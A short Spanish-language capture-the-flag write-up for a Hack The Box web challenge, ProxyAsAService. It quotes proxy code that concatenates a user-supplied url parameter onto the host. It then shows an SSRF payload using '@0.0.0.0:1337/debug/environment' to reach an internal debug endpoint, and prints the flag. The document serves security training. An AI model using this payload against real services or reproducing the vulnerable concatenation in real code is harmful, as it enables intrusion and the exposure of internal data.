Proxyasaservice

Challenge Description

Experience the freedom of the web with ProxyAsAService. Because online privacy and access should be for everyone, everywhere.

Categoria: Web
Dificultad: Fácil
Puntos: 20

Solution

En el codigo identificamos que la aplicacion es vulnerable a SSRF por lo siguiente.

    target_url = f'http://{SITE_NAME}{url}'
    response, headers = proxy_req(target_url)

La aplicacion esta concatenando el parametro url al sitio original. Nos podemos aprovechar de esto de la siguiente forma.

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery

http://83.136.251.226:49752/?url=@0.0.0.0:1337/debug/environment

Esto nos redireccionara al localhost y nos dara la flag.

HTB{fl4gs_4s_4_S3rv1c3}